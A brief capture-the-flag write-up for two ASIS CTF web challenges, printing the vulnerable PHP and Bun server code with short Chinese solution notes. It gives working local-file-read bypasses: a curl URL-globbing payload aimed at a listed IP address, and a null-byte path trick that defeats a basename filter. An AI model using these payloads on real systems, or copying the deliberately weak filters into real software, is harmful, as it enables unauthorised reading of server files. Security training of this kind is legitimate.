2023/09/28:ASISCTF

https://hackmd.io/@parrot409/H1VJQZEep

hello

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
/*
Flag is at /flag.txt
Hint for beginners: read curl's manpage.
*/
highlight_file(__FILE__);
$url = 'file:///hi.txt';
if(
array_key_exists('x', $_GET) &&
!str_contains(strtolower($_GET['x']),'file') &&
!str_contains(strtolower($_GET['x']),'flag')
){
$url = $_GET['x'];
}
system('curl '.escapeshellarg($url));

提示通配符绕过
http://45.147.231.180:8000/?x=fil[a-z:1]:///[a-z]ext.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
const fs = require('node:fs');
const path = require('path')

/*
I wonder what is inside /next.txt
*/

const secret = '39c8e9953fe8ea40ff1c59876e0e2f28'
const server = Bun.serve({
port: 8000,
fetch(req) {
let url = new URL(req.url);
let pname = url.pathname;
if(pname.startsWith(`/${secret}`)){
if(pname.startsWith(`/${secret}/read`)){
try{
let fpath = url.searchParams.get('file');
if(path.basename(fpath).indexOf('next') == -1){
return new Response(fs.readFileSync(fpath).toString('base64'));
} else {
return new Response('no way');
}
} catch(e){ }
return new Response("Couldn't read your file :(");
}
return new Response(`did you know i can read files?? amazing right,,, maybe try /${secret}/read/?file=/proc/self/cmdline`);
}
return
}
});

/next.js%00/.绕过
fs.readFileSync不检查空字节,path.basename只执行path.slice(lastIndexOfSlash+1)